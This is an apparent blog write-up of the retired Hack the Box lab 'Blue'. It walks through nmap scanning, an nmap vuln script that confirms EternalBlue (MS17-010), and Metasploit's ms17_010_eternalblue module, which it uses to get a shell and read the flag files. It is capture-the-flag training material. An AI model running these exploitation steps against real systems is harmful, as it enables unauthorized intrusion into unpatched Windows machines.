Hello friends!! Today we are going to solve another CTF challenge
“Blue” which is lab presented by Hack
the Box for making online penetration practices according
to your experience level. They have collection of vulnerable labs as challenges
from beginners to Expert level. HTB have two partitions of lab i.e. Active and
retired since we can’t submit write up of any Active lab therefore we have
chosen retried Blue lab.
Level: Beginners
Task: find user.txt and root.txt file in victim’s machine.
Let’s
begin the Game!!
Since these labs are online available therefore they have static
IP and IP of blue is 10.10.10.40 so let’s begin with
nmap port enumeration.
nmap -sV 10.10.10.40 --open
From given below image, you can observe that we found so many open
ports and port 137, 139 and 445 denotes that it is windows machine.
When I extract complete result of nmap I found following
details
·
OS: windows
7 professional
·
Computer name: haris-pc
·
NetBIOS computer name haric-pc
·
Smb version: 2.02
Great!! Form this
result I can conclude username can be “haris” moreover smb 2.02 can be exploit
by eternal blue vulnerability.
Let confirm eternal blue vulnerability in victims system
using namp script.
nmap --script vuln
-p445 10.10.10.40
Awesome!!
Victim’s machine is vulnerable to eternal blue exploit.
Then I run msfconsole
command in terminal and load metasploit framework for using eternal blue module
for exploiting target machine.
use
exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue)
> set rhost 10.10.10.40
msf
exploit(windows/smb/ms17_010_eternalblue) >run
Terrific!! I
have got unauthorized access of victims command shell through session 1 as shown in below image.
Inside c:\Users\haris
\Desktop I found user.txt file
and used type “file name” command for reading this file.
cd Desktop
type user.txt
Inside c:\Users\Administrator
\Desktop I found root.txt file
and used type “file name” command for reading this file.
cd Desktop
type root.txt
Great!! We got
our 2st flag successfully.
It was very easy challenge for those candidate who have
knowledge little know vulnerability analysis.
Happy Hacking!!
0 comments:
Post a Comment